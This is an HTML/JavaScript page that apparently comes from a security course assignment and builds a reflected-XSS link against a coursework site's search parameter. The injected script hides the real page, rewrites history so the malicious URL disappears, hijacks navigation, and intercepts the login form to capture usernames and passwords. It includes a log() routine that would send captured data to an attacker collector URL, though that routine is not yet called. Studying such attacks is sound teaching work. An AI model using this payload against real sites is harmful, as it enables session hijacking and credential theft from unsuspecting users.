  1. <meta charset="utf-8">
  2. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
  3. <script>
// Reflected-XSS demonstration payload for the coursework target named at the
// bottom of this file. makeLink() serialises this whole function with
// payload.toString() into the target's `q` query parameter, so it only works
// where `q` is reflected into the page unencoded (xssdefense=0). Once it runs
// inside the victim page it hides the real document, rewires navigation and
// the search/login forms through proxy(), and prints what the user types.
// From a defender's view this is exactly what output-encoding of `q` or a CSP
// that forbids inline script would stop.
//
// NOTE(review): every comment inside this function is part of
// payload.toString() and therefore of the generated link and the injected
// <script>; keep the body short if link length matters.
//
// @param {string} attacker - URL that log() would send captured data to;
//   makeLink() bakes it into the `payload("...")` call (see bottom of file).
function payload(attacker) {

  // Serialise `data` (a plain object) as a query string to the console and
  // GET it from the attacker URL. Nothing in this listing calls log() yet
  // (see the TODO in the login handler); it is only copied into the page via
  // log.toString() below. As shipped, captured input stays in the console.
  function log(data) {
    console.log($.param(data));
    $.get(attacker, data);
  }

  // Re-attach the hijacking handlers after the page HTML has been replaced
  // (by proxy() or by the initial load below) and reveal the page again.
  // Replacing the <html> contents discards earlier handlers, hence the
  // re-binding on every load.
  function loadcallback() {
    console.log("callback called");

    $("html").show();

    // Home link: strip the real href and route through proxy(). A history
    // entry is pushed only when the recorded url is not already "/".
    // history.state is dereferenced without a null check here.
    $('#bungle-lnk').removeAttr("href");
    $('#bungle-lnk').click(function() {
      proxy('/', history.state['url'] != '/');
    });

    // "Search again" link: same treatment, always pushes an entry.
    $('#search-again-btn').removeAttr("href");
    $('#search-again-btn').click(function() {
      proxy('/', true)
    });

    // History links: remember each original href, then load it via proxy().
    $('.history-item').each(function() {
      var value = $(this).attr('href');
      $(this).removeAttr('href');
      $(this).click(function () {
        proxy(value, true);
      });
    });

    // hijack search form: submit via XHR so the injected script keeps running
    $('#search-btn').click(function(e) {
      e.preventDefault();
      var attr = $("#query").val();

      // log to attacker -- currently only a console message, nothing is sent
      console.log("search clicked");

      // fill in page. jQuery URL-encodes `q` in `data`, but the proxy() call
      // below concatenates the raw value, so the page is fetched twice and
      // the second request carries `attr` unencoded.
      $.ajax({
        url: "./search",
        data: {
          q: attr
        },
        type: "GET",
        success: function (data) {
          $("html").html(data);
          proxy("search?q=" + attr, true);
        }
      });
    });

    // problem 1: click twice for search
    // problem 2: going back and forward is searching!

    // Login form: read both fields, then replay the real POST so the victim
    // still gets logged in and notices nothing.
    $('#log-in-btn').click(function(e) {
      e.preventDefault();
      var un = $('#username').val();
      var pw = $('#userpass').val();

      //TODO: log to attacker -- as shipped, credentials are only printed to
      // the victim's own console, not exfiltrated.
      console.log("btn clicked: " + un + ", " + pw);

      $.ajax({
        url: "./login",
        data: {
          username: un,
          password: pw,
        },
        type: "POST",
        success: function (data) {
          $("html").html(data);
          // shouldPush is undefined here, so proxy() takes its else branch and
          // overwrites the response just inserted with the HTML snapshot held
          // in history.state (throws if history.state is null).
          proxy("/");
        }
      });
    });
  }

  // Navigate to `href` without leaving the injected script: fetch the page
  // into <html> and record both the url and the resulting HTML in history
  // state so back/forward can restore it without a network round trip.
  // @param {string} href - path to load (same-origin, via jQuery .load)
  // @param {boolean} shouldPush - true: fetch and pushState; falsy: restore
  //   the HTML snapshot from history.state instead of fetching.
  function proxy(href, shouldPush) {
    console.log('proxy called');

    // add appropriate url to the history stack
    if (shouldPush) {
      $("html").load(href, function() {
        loadcallback();
        history.pushState({url: href, html: $("html").html()}, "", href);
      });
    }

    else {
      // Assumes history.state was set by pushState/replaceState above.
      $("html").html(history.state["html"]);
      loadcallback();
    }
  }

  // do this on first injection: blank the page until the clean copy of "/"
  // has been loaded, so the reflected script text is never shown.
  $("html").hide();
  $(document).ready(function() {

    // load script to the page: re-declare attacker, proxy, log and
    // loadcallback as globals from their source text. `attacker` is
    // interpolated into a single-quoted literal without escaping, so a value
    // containing a quote would break the generated script.
    var script = document.createElement('script');
    script.type = "text/javascript";
    script.text = "var attacker = '" + attacker + "';\n" + proxy.toString() + "\n" + log.toString() + "\n" + loadcallback.toString();
    $("html").append(script);

    // popstate handler: restore the snapshot recorded for that entry.
    // e.state is read without a null check and would throw for an entry
    // that carries no state.
    window.onpopstate = function(e) {
      proxy(e.state['url'], false);
    };

    // initial history and page setup: first rewrite the address bar so the
    // URL carrying the injected `q` is not visible, then load the real front
    // page and record it as the first snapshot.
    history.replaceState(null, "", "/"); // avoid flashing link
    $("html").load("/", function() {
      loadcallback();
      history.replaceState({url: "/", html: $("html").html()}, "", "/");
    });
  });
}
  122.  
/**
 * Build the link that reflects payload() into the target's search page
 * through the `q` query parameter.
 *
 * Only the undefended case (xssdefense == 0) is handled; for any other
 * value the function returns undefined, so the anchor written by the ready
 * handler below ends up with href="undefined". Note that `target` as set in
 * this file ends in "/", so the result contains "//search".
 *
 * @param {number} xssdefense - defence level forwarded to the target
 * @param {string} target - base URL of the target site
 * @param {string} attacker - URL baked into the payload("...") call
 * @returns {string|undefined} the full link, or undefined when unhandled
 */
function makeLink(xssdefense, target, attacker) {
  if (xssdefense != 0) {
    // Other defence levels are not handled by this listing.
    return;
  }
  var injected = "<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");<\/script" + ">";
  var query = "/search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent(injected);
  return target + query;
}
// Assignment parameters as shipped in this listing: defence level, the
// target site, and the collector URL handed to payload() by makeLink().
var xssdefense = 0;
var target = "http://cos432-assn3.cs.princeton.edu/";
var attacker = "http://127.0.0.1:31337/stolen";

// Once the DOM is ready, swap the <h3> placeholder for the generated link;
// the anchor opens in a browsing context named "run".
$(document).ready(function() {
  var url = makeLink(xssdefense, target, attacker);
  var anchor = "<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>";
  $("h3").html(anchor);
});
  136. </script>
  137. <h3>parse error</h3>